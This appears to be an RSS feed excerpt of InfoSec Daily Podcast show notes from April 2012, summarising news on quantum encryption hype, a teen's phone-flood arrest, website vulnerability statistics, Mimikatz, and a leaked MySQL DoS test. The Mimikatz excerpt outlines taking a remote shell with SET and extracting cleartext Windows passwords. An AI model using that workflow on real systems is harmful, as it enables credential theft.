<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://averysawaba.blogspot.com/2012/04/uncrackable-quantum-encryption-unicorns.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://averysawaba.blogspot.com/2012/04/uncrackable-quantum-encryption-unicorns.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.zdnet.com/blog/security/researchers-develop-quantum-encryption-method-to-foil-hackers/11326"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/security/researchers-develop-quantum-encryption-method-to-foil-hackers/11326</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&#39;m only going to address uncrackable quantum encryption though. I&#39;m not touching unicorns or</span><a href="http://www.steorn.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">perpetual motion</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.zdnet.com/blog/security/researchers-develop-quantum-encryption-method-to-foil-hackers/11326"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">This article</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> over at ZDNet was responsible for sending me down this rabbit hole, though I&#39;ve been rolling my eyes at &quot;Uncrackable Quantum Encryption&quot; articles for at least a decade.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><img height="264px;" src="https://lh6.googleusercontent.com/6QWYu0FynuhKWyjNMWjer-lALQVk1Q204lsTHFP9NHdG-wASxIkcYu0AuJkXEY06LjJIw8Ytw1jKQ8kEbNP6EB5ajZiG8QtzFJMMKIhJoSFhmTV3wdc" width="454px;" /></p>
<p><img height="235px;" src="https://lh5.googleusercontent.com/kk9yqBu-KJb3Lj9Et_Dd-Jg_CQOTPgAk9di3-3XLgcb5N4cKUnyGZQ90n6mdXiwuZWcyHqImWOnCvq5mGAsk10AHplgShG-8JYmhylDAUIm5znBzTKg" width="245px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">First off, most of the &quot;uncrackable quantum encryption&quot; claims refer to encrypting data for transmitting across networks, between endpoints. The idea is that you can make a tamper-evident system due to the nature of quantum mechanics. If an attacker attempts to manipulate or observe data in a quantum system, the data will be altered. Once altered, we&#39;re aware of the attacker and can take countermeasures.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is more likely that companies and researchers trying to sell the idea of quantum encryption are depending on its Sci-Fi &quot;WOW&quot; factor to sell it as the next big thing in cryptography. In reality there are many issues with quantum cryptography.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. It is new, and largely untested</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. We </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">already have</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> uncrackable encryption&#8230;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. The </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">real</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> problem in most encryption failures is poor implementation</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. Aside from researchers, no one is attacking cryptography</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Show me some uncrackable quantum encryption that keeps your data safe, and I&#39;ll show you the </span><a href="http://media.threadless.com//imgs/products/1000/636x460design_01.jpg"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">treadmill</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> I use to power my house. He never gets tired.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://threatpost.com/en_us/blogs/uk-teen-teamp0ison-member-arrested-phone-bomb-attack-041712"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/uk-teen-teamp0ison-member-arrested-phone-bomb-attack-041712</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A British teenager beleived to be the hacker TriCk, a founding member of TeaMp0isoN has reportedly been arrested after launching a denial of service attack against an anti-terrorism hotline in the UK.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The 17 year-old, a resident of Birmingham in the UK, was arrested on April 12 in connection with a high profile &quot;phone bomb&quot; attack on a telephone hotline used to collect reports of possible terrorist activities. The attack, on April 11th, used an automated system to flood the hotline with calls in which a computerized voice said TeamP0ison,&quot; overwhelming phone operators. He and another 16 year old UK teen were arrested by members of the Metropolitan Police&#39;s eCrime Unit and charged with one count of causing a public nuisance and one count of violating the UK&#39;s 1990 Computer Misuse Act, according to Richard Jones, a spokesman for the Metropolitan Police.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Metropolitan Police would not identify the youth by name, citing legal protections for minors. Nor would the agency confirm that either youth was TriCk or a TeaMp0ison member. However, in a post attributed to TeaMp0ison on the Web site Pastebin, the group identified one of the arrested teenagers as founding member TriCk.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We&#39;ve lost the first and most important member of our team; our founder, our brother, our family member. Most importantly we lost a fighter for freedom, a fighter against corruption,&quot;</span><a href="http://pastebin.com/YvxRDAZk"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the statement reads</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prior to the arrrests, the group and the member known as TriCk had been outspoken about their role in the attack on online. In an interview on the Web site Softpedia, someone claiming to be TriCk said the phone bomb attack was run using a software program known as Asterisk running on a compromised server in Malaysia. The attack was launched in retaliation for UK treatment of terrorism suspects and moves recently to extradite suspected terrorists to the U.S.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.pcadvisor.co.uk/news/security/3351453/website-vulnerabilities-fall-but-hackers-become-more-skilled"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3351453/website-vulnerabilities-fall-but-hackers-become-more-skilled</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The number of coding mistakes on websites continues to fall but companies are slow to fix issues that could be exploited by hackers working with improved attack tools, a security expert said.&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The average number of serious vulnerabilities introduced to websites by developers in 2011 was 148, down from 230 in 2010 and 480 in 2009, said Jeremiah Grossman, chief technology officer for WhiteHat Security, which specializes in testing websites for security issues. Grossman spoke on the sidelines of the Open Web Application Security Project conference in Sydney on Monday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The vulnerabilities are contained within custom website code and are not issues that can be fixed by applying patches from, for example, Microsoft or Oracle, Grossman said. According to WhiteHat Security statistics, it takes organizations an average of 100 days to fix about half of their vulnerabilities.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The risk is that vulnerabilities which haven&#39;t been speedily remedied could be found by a hacker, resulting in a high-profile data breach such as those that affected Sony, the analyst firm Stratfor Global Intelligence, and AT&amp;T.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers are honing their skills and are becoming better focused. They are using a wider array of improved tools in order to find coding problems in websites. &quot;Offense gets better every year,&quot; Grossman said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://cyberarms.wordpress.com/2012/04/16/remotely-recovering-windows-passwords-in-pl"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://cyberarms.wordpress.com/2012/04/16/remotely-recovering-windows-passwords-in-pl</span></a></p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There has been a lot of buzz across the web the last few months about a program called &ldquo;Mimikatz&rdquo;. It is an interesting program that allows you to recover Windows passwords from a system in clear text. Why spend hours, days, or months trying to crack a complex password when you can just pull it from Windows memory as unencrypted text?</span></p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We have seen in the past that most Windows passwords less than 15 characters can be cracked in just a few seconds if the attacker can get the Windows Hashes. This is due to the fact that Windows stores these passwords in an easy to crack LM hash. An old encryption used for backwards compatibility. Microsoft allows you to disable the older LM Hash, but as Mike Pilkington discusses on the SANS </span><a href="http://computer-forensics.sans.org/blog/2012/02/29/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Microsoft still creates the hash and stores it in memory.</span></p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No big deal, just make your passwords 15 characters or greater and problem solved. The LM hash will not be created, only the more secure NTLM hash. Well, not so fast. It seems that the LM hash is not the only version of the passwords Windows keeps in memory, it also keeps a copy of the passwords in plain text.</span></p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Which you can even recover remotely&hellip;</span></p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pauldotcom.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has a great article explaining how to use Mimikatz to recover remote passwords. In this example, I used the website Java attack through the Social Engineering Toolkit (SET) to obtain a remote shell. First thing you will want to do is download</span><a href="http://blog.gentilkiwi.com/mimikatz"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Mimikatz</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and place the files you need (Windows 32 or 64 bit) in a directory on your Backtrack system. Then run SET and pick the website java attack option.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.h-online.com/security/news/item/Oracle-accidentally-release-MySQL-DoS-proof-of-concept-1526146.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.h-online.com/security/news/item/Oracle-accidentally-release-MySQL-DoS-proof-of-concept-1526146.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Recently Oracle accidentally released a MySQL denial-of-service (DoS) proof of concept in the process of fixing the same problem. In March, the company released updates to MySQL, versions 5.5.22 and 5.1.62, which referred in their changes to &quot;Security Fix: Bug #13510739 and Bug #63775 were fixed&quot; with no other details on the problems. It is a common practice to keep details of issues which could be used to against older versions of software; even the bug reports for</span><a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=13510739"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">13510739</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and 63775 are not yet publicly available.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But, as security researcher Eric Romang</span><a href="http://eromang.zataz.com/2012/04/10/oracle-mysql-innodb-bugs-13510739-and-63775-dos-demo/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">found</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Oracle also shipped the new MySQL versions with a development script &quot;mysql-test/suite/innodb/t/innodb_bug13510739.test&quot; in the source which appears to be not only part of the automated testing for MySQL, but also a proof of concept for the flaw which crashes MySQL 5.5.21 and earlier versions. Romang posted the script on</span><a href="http://pastebin.com/tCxNTD96"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pastebin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">; it requires authenticated access and appropriate privileges to be run which mitigates the problem somewhat.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This incident demonstrates that, especially with applications where the buildable and testable source code is released, if a company is going to adopt a non-disclosure policy, it really is necessary to make sure that absolutely no information leaks out in the form of test scripts. A better path for companies is to adopt a policy where they fully document what they have fixed and release test scripts for administrators to test their installations; trying to hide security bug fixes makes no sense when criminals and other bad actors are already looking for them and will find plenty of hints in the code itself.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.phrack.org/issues.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phrack.org/issues.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If not talked about yet, should note that Phrack issue #68 is out.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-647-quantum-encryptiontrick-100-days-mimikatz-and-mysql-dos/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3781/0/infosec-daily-podcast-episode-647.mp3" length="58659404" type="audio/mpeg" />
		<itunes:duration>0:40:43</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 647 for April 17, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Themson Mester.
Special Guest Co-Host SkyDog.
&#160;
Announcements:
Outerz0ne 8
	When: Apri[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 647 for April 17, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Themson Mester.
Special Guest Co-Host SkyDog.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: http://averysawaba.blogspot.com/2012/04/uncrackable-quantum-encryption-unicorns.html
http://www.zdnet.com/blog/security/researchers-develop-quantum-encryption-method-to-foil-hackers/11326
I&#39;m only going to address uncrackable quantum encryption though. I&#39;m not touching unicorns or perpetual motion.
&#160;
This article over at ZDNet was responsible for sending me down this rabbit hole, though I&#39;ve been rolling my eyes at &#34;Uncrackable Quantum Encryption&#34; articles for at least a decade.


First off, most of the &#34;uncrackable quantum encryption&#34; claims refer to encrypting data for transmitting across networks, between endpoints. The idea is that you can make a tamper-evident system due to the nature of quantum mechanics. If an attacker attempts to manipulate or observe data in a quantum system, the data will be altered. Once altered, we&#39;re aware of the attacker and can take countermeasures.
&#160;
It is more likely that companies and researchers trying to sell the idea of quantum encryption are depending on its Sci-Fi &#34;WOW&#34; factor to sell it as the next big thing in cryptography. In reality there are many issues with quantum cryptography.
1. It is new, and largely untested
2. We already have uncrackable encryption&#8230;
3. The real problem in most encryption failures is poor implementation
4. Aside from researchers, no one is attacking cryptography
Show me some uncrackable quantum encryption that keeps your data safe, and I&#39;ll show you the treadmill I use to power my house. He never gets tired.
&#8230;.
Source: http://threatpost.com/en_us/blogs/uk-teen-teamp0ison-member-arrested-phone-bomb-attack-041712
A British teenager beleived to be the hacker TriCk, a founding member of TeaMp0isoN has reportedly been arrested after launching a denial of service attack against an anti-terrorism hotline in the UK.
The 17 year-old, a resident of Birmingham in the UK, was arrested on [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 646 &#8211; Great Failwall of  China, More Mac Malware, Microsoft iPhone, Boeing Android, Farmer&#8217;s Market, and LulzKnights</title>
		<link>http://www.isdpodcast.com/episode-646-great-failwall-of-china-more-mac-malware-microsoft-iphone-boeing-android-farmers-market-and-lulzknights</link>
		<comments>http://www.isdpodcast.com/episode-646-great-failwall-of-china-more-mac-malware-microsoft-iphone-boeing-android-farmers-market-and-lulzknights#comments</comments>
		<pubDate>Tue, 17 Apr 2012 00:55:33 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3774</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 646 for April 16, 2012. Tonight&#39;s podcast is hosted by Dave Kennedy, Rick Hayes, Beau Woods, and Karthik Rangarajan. &#160; &#160; Special Co-Host Varun Sharma. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College [...]]]></description>
